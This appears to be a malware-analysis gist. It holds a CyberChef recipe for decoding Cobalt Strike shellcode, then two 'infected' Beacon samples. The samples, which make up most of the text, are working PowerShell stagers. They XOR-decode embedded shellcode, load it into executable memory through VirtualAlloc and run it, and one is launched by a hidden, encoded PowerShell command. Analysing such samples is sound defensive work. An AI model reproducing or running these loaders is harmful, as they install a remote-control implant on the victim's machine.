sopsmattw/0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe

## 0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
[{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}]

## 1_Beacon_sample-1_infected
Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckt2hyMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMTRR1EkhGVWROcXZvdnJCG1loTUAUcU1OUWJ3SlFNYFQjvLTHW2pHWSH8aiBzI6YUm3dAYLUNnsdxRUJhSsiV7rV2fxUkSKHG4Qfm2my6I3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwt0Sk1HTFRQA213AxUNEhgDdGx0FRcYA3dRSkdGTVcMFA0TGANRVRkSEg0TCgNPSkhGA2RGQEhMLikjPpmncpaTwXXfZ/P4PxXiSMhg8Vu3fsdoQZEAmRULgWILIWjS5Je9oY2tRF/3CVK0iG/EGiE4pskDsNBcFnti+smmfGmSz6DP3ghXDgq2EIFw/45tPo/3s3t7ZgfV5tF7mOcRbALoMqRsxsGv7ecHfLNbv55Ts7Gz43mpw7AKhte18aEwaelJ8rBaPiMAN3J6DIOl2R0y5Uh9KrEGhX3rA5JCkpTg3eA74fjMd0WEFN2xfp5z0dP39jOMCyZraMTiAHCpV0HNzmVjKRoj8ipg20F/fitioP9EvUs8+CNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcU0JQV0ZBSk0OUFZASFAOTUxUDUFKWSMxF3Vb')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

## 1_Beacon_sample-2_infected
%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwA3ADMAUABhAE8AQgBQACsASABQADQASwBmAGMAaQBNADcAUwBsAFEARQBuAEoAcAA2AEUAMQBtAHkAbQAvAE0AQwA0AFQARwBKAEsASABsAEcARQBiAEkATQBqAEUAUgBGAGsAaQB5AHcAVgB6ADcAdgA3ADgAcgBHADMAUAAwAG0AcgB4AHYAWgArADQAeQB3ADAAUwBXAGQAbABlADcAegB6ADYANwBLADQAZQBxAGcAcQBPAEUAVAAxAFMAZgB1AHgAUQBWAEgAcQBtAFEAUABnAC8AUQBaAFMANQAzADMAdQBDADIAUQByAGYAbwBrADUASAB6AHcAbwBBAG8AdgBhADAAWABzAHcAVgBWAHMANwBYAGcAWgBJAFoAZABWADEAQQBwADAAWgArADUAcwB5AEUAVwBlAEkAWABNADgAdwBpAEwAMgBZAHEANwBJAGEATgA1AGwASAB4AG8AUQBlAHEARwBnAGwAcABuAFoANwBtAHoAWgBDAHMATQBKAFAAYgBvAEwATQBEAEsAagArAGgAcwBSAGQAVQB6AGQAeQBWAGMAWgBFADYAcQA2ADMAVwBEAHIANwBBAGYAVABEADkAKwByAEkAZABDADAARQBDAGwAMwA4AFUAMgBWAFYAVQBwADYAVwByAE8AZgBDAHAATgBDADMAMQBEAFQAOAA5AFUAMABNAEwAZABmAEUAbQBKAFEAbgArAGkAOAAxAG0AeAB6AGYAZwBjAHMANABOAFkAWABNAGYAawBHAFEASwBxAEIAcQA0ACsANgAzAEcAQwBkAFEAUgBGAFoAOAAxADgAWgBSAHAALwAvAEcARgBZAGsAOABMAEYAdABOAGoAYwBoAEoAaABKADAAMwBCAGkAcQBlAGkAcQA2AEQASgBtAFcATwBpADcAcABTADgAYwB4AFcAdABxAEcAbgAyAGYAQwBDADYANQBwADQAcABQAGYAbABDACsATABEADQAawAzAGcAOABTADUALwB1AHAANwA0AFoAMQBpAEcAeQB4AHgAaABEAEgAMgAwAEYAcQBxADYAbQBPAGEAYwBCAHkAQwBOAGgAVQBVAHcAeQBOAFAASgByAG8AKwB5AGIAVABLAGYAcAAwADkATwBZACsARABKAFMALwBvAGsAVQA3AFUARgBUAHcAdABVAE4ARgA1AEIATQBxAGkAeAAwAGMAdQBJAHoAZQBVAHcALwBVAEQAQQBuAHAAQwB4AGEARwBCAFUANABJAHEAawBJAFIAbwBNAHcAWAAwAEkAdgA0AEMAegBYAFAAZwA1AEMAeABQAE4AaQBkAC8ASwByAGQAcQBUAG0AZwAyAHcAegBjAFgAMQBVAHkAVAA1AFYAQQBhAHEAaQBFAGwAVAA5AHcANABsAGYAZwA2AEMAZQA4AFMAYwAxAEIATwBEADkANQBmADAASQB1AEMALwA1ACsASQBwAGkAVgArADUANQA3AGgAYQBvAHUAWgBYAFMAQgBGAFoAMABwAHcAUABlAEUAcQA3AG0AegBzADAAbQB5AHAAQgBDAFAATwBlAFQAUwBUAC8AUgB1AFUAUwBtAFAAKwB1AEEARQBWAGwAegBFAE8AcAAwAGoARQBWAEoAcgArAGwAZAArADAAbQBzAHoAVABaAGwALwAwADkAQgBGAHAAbgBYAFEAUwBkAE8AVAArAG4ARwBMAEoAbwAvAGMAZAA2AGUANQBNAHkAdAAzAFkASQAvAGUAbgA4ADEARABuADcAbABVADYAUABPADMAcQA2AEYAQgBQAFQAKwBnAGoAVABqAEEASwA1ADkAawBoAEQAZABmAHkAeABuADEARwBFADMAdwBLAEcAWgBpAEEALwBEAFQATgBBADQASAAxAEcAMABjADAARABFADAAbwBKAE8AZgAxAFoAbwByAFgAeAAxADEAYQA2AGwAegBWAFEASgA1AGwAKwBBAFYAVQBNAEwANgAwAFoAawAwAGgANgBaAGgAQgAzADIANgBBAHYAegBTAGIANgBEAHAAdQBRAGQAbABSAGoAUABwAFEAMgBuAEYAMgBlADMANgBXADMATwA1AHoAcgBDAFUAZQBUAFEATQBvAGMANQBKAEgAagBrAFUATQArAHIAbQBVAFQAVwBRAC8AdQBHAG8ARwBpAHEAZQBMAEkAMgAvADMATwAyAEgAVABQAGsARQBTADUAVwBaAG0AMQBxAHYAUQBIAHEANAB1AHMANABEAHEASgBpAFEAUQBIAFkAQgBoAHAARwB6AHAAcwBUAEgAVABLAE8AUwBSAHgAMwBmAHAAYgBYAFkAOABSAGUAWgBDADgAYQByAG0ATgBRAHgAWQAxAEIAeQBZAEMAbQBDAG4ATQBDAE8AeABzAEoAUgBtAGoAUABDAHoAZgArAGQASAAxAGIAUgBvAGMAcABlAHIAUgBsAGQAZwBYAFQAUwBoAFYAbwBNAEwANgBEAG4ASABDAG8AcQBvAFIAdABlAFUATgBmADQASAAyADUAbgBkAFoASQBXAGgAYwBZAHEAQQArAG4ARQBhAFMAQwBBAHcANwBqAEsAbwAwAGQAZgBLAE8AaAByAFIAdgA0AG4ANAB2ADAAegA5ADMANQBzAE0AVAArADQAVwBSAGYAMABrAEUAZwB6AEsAYwBSAEoATABWAGEANgBYAEIASgBKAG8AbwBmAEwANwBSAEgATABCAEQAbQBoAEEATABXAFcANABLAHMAYQBsAHYAVAA2AHkAawBuAGEAbQBHAG0AVQBiADgASwBOAEgAZgBlAFgAbgA2ADkARgB1AHgAbQAxAE8AcAB0AE8AYwB3AFMALwBDAEgANwBsAFQAYQB2AFoANgAzAFgAdgAxADcAWAA3AEgAbQBtAEcAZAA4AE4ATwBxAGUAdgBaAG4AMgA4AGEAVgArAEUAMgB0AE0ATgBSAHIAVgBSAHUAbABVAEIAdQB2ADIAawAzAFAAVAB1ADYANAAxADgAdQB3AHQAWABWAGgAYgB1ADIAbwB3AEgAcwB5AFEAKwBiAGoAbQB6AFkAVQBhAFAAYQB1AGQAegB3ADEAdgBYAEMAcgB4AHoAcwBwAFAAcQBmADUAOQB1AEwAKwBkAGgAdQBmAFoAaQAzAFcAMQBlAGQAUgA5AG4AUwA4AGgAMAA3AHEAcgBVADIAOQBRAHEASAA5AFgAcwA3AHEAdgBNAHUANgBOADEAYwByADQAUABhADEAcgAyAGkAegBlADQAMQBIAGYAZgBJAHQAcQB4AHUASwBGADcAcwA0AHYAOAA4AHYAbQB1AEcAZwArADYAWABrAGwAegAyAEkAUQBhAG4AcwBpAGYAZAArAHEAQgByAGwAOQBTAEgANQAzAEsAagBYAFIANQArADMAYwBkAGMATAB1ADEANAA4AEYAcwB6AFgATQBmAGsAUgBTADUAZgBZAHIASgAwADQAcgB0AFIATgB3AGEANQBsAHgAZgBtAE8ATABXAGQAYwAvAGwAMQA5AEgANwBvAGsAVQBwAHcAeAB3AGQAYgB0ADIAdQBYAFcANwAxADYAYQBVAGUAMwA3AHYANQB5AEgAUQA3AEcAbwA0AGUAWABwAGUATwBBAC8ATABWAG8AOABiAHUASABZAEMAUABiAGkAeQBzAG4ANQBPAE0AdABpAFcARAAvAHcAbgBIAGMAbgBRAHUAQgBSAGUAUAA0AFMAMwBtAEkAdQBiAHMAbAArADIAUQAvADcAagBmAGcANwB0AE0AegB3AEkAZQBVAE4AKwAyAGIARABzAFEAVgAxAE8ASwBlADIAUABnAEUATQBDAGUAZABmAHQAeAA3AGoAbwBkAE8AWQB0AE4AdABSAHMAdABMADcANABNAEgALwBwAGUAYwBkADAAOABYADYAMAA2AEgAVgBEAFkAZwBmAC8AMABjADEAVwBLAEoAcgB4AGgANQBjAFMAcAAzAFQANAB2AHgAbQBGAFQAVQByAGwAUABiAEQAMwB0AGsAcwBDAGYAbABUAHUAVgA5AFkAMQB3AFoATwBXAHoAUQA5AGkANQBxADQAOAAvAE0AZgBYAHIAbwBiAEIAKwBhAEQAOAAyAHgAdgBXACsATwAzAFUAZAA1AHEAMQBuAGwAYwBRAEYAegBZAHEAZAA3ADcAKwA4AEkALwBoAGUAWQBRAGsAZgBlAEEARgB1AEEAaQBIAHIALwAzAFQAdABMADkAKwAvAGoAeQBlAFIAOABOADgAMwBtADcAZgBHADcATQBOACsAQgB0AGYASgB2AG0AbwBQAEoAUwBZAFIAUABtAFAAZgBXAEUATwB0AGoASQBaADgAeABBADAAYgBDAEkATQByAGEAUwBJAHUATAAxAG0ARwBjAEQATABtAHYATgBVAHoAegA5AFIAZgBRAEMAeABVAEIAWgBmAEEANgBnAFAAZABEAFYAbgB4AFYAeABqAGoAUgBBAC8AQwBOAFMAUQBUAGoATwBCADIAUwBVADIAZwB5AEQANwBBAHMAWAA3ADYANgBzAHQAQgBSAEUASwBaAGUARwB0AE0AOAA5AEwAeABrAFMAQgB3AGkAegBHAFoAbABKAHYAagB4ADQAMQBjAEkATAAzADgAQwBZAG8AOABHAEMALwBXAGMAUgA2AFYAZAB1AFYAUQBxADYAZgA5AFgASgBTAHYAMwA2ADcARABVACsAVABvADIAagArAGIAeQBlAGsAaQBlAGUASABKADYARQAwAHQAdQBzAGcANwBvAGkAegBCAFkAMABYADgAeABBAFQAOQBjACsAdgArAGgAMQBlAEEAbABjAC8AWQBJAFgAZQBMAFEANgAzAGgAWgBPAGUATgBUAEwAbQBkADcANgBHAFIAZgArAG4AdAA0AFIAZABJAE4AdQBrAG0ANABKAHgAVQBXAHEAcgBEAGsAYwAzAGgAeQBKAGoAMwBVAFAATQBjAFcAcwBwAHQAagBkAEkANwBSAGQAMQBTAEEAOABLAHEAeQBmAEEAbgB2AFQAcgBFAEkAZABVAE4ARgA2AFQAUAA2AEcAOQBwAGkAUAAxAFgAOABoAHUANABwAG8AZgBBAE0ASwBuAFQANQBIAEYAaABLAFkAUwA1AHEAMAA0AGsAUgBMAFEAeAA3AC8AdwBYAEsAVABPAHAAdQBsAHcAcwBBAEEAQQA9AD0AIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
	Set-StrictMode -Version 2

	$DoIt = @'
	function func_get_proc_address {
	Param ($var_module, $var_procedure)
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
	}

	function func_get_delegate_type {
	Param (
	[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
	[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
	}

	[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckt2hyMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMTRR1EkhGVWROcXZvdnJCG1loTUAUcU1OUWJ3SlFNYFQjvLTHW2pHWSH8aiBzI6YUm3dAYLUNnsdxRUJhSsiV7rV2fxUkSKHG4Qfm2my6I3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwt0Sk1HTFRQA213AxUNEhgDdGx0FRcYA3dRSkdGTVcMFA0TGANRVRkSEg0TCgNPSkhGA2RGQEhMLikjPpmncpaTwXXfZ/P4PxXiSMhg8Vu3fsdoQZEAmRULgWILIWjS5Je9oY2tRF/3CVK0iG/EGiE4pskDsNBcFnti+smmfGmSz6DP3ghXDgq2EIFw/45tPo/3s3t7ZgfV5tF7mOcRbALoMqRsxsGv7ecHfLNbv55Ts7Gz43mpw7AKhte18aEwaelJ8rBaPiMAN3J6DIOl2R0y5Uh9KrEGhX3rA5JCkpTg3eA74fjMd0WEFN2xfp5z0dP39jOMCyZraMTiAHCpV0HNzmVjKRoj8ipg20F/fitioP9EvUs8+CNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcU0JQV0ZBSk0OUFZASFAOTUxUDUFKWSMxF3Vb')

	for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
	}

	$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
	$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
	[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

	$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
	$var_runme.Invoke([IntPtr]::Zero)
	'@

	If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt \| wait-job \| Receive-Job
	}
	else {
	IEX $DoIt
	}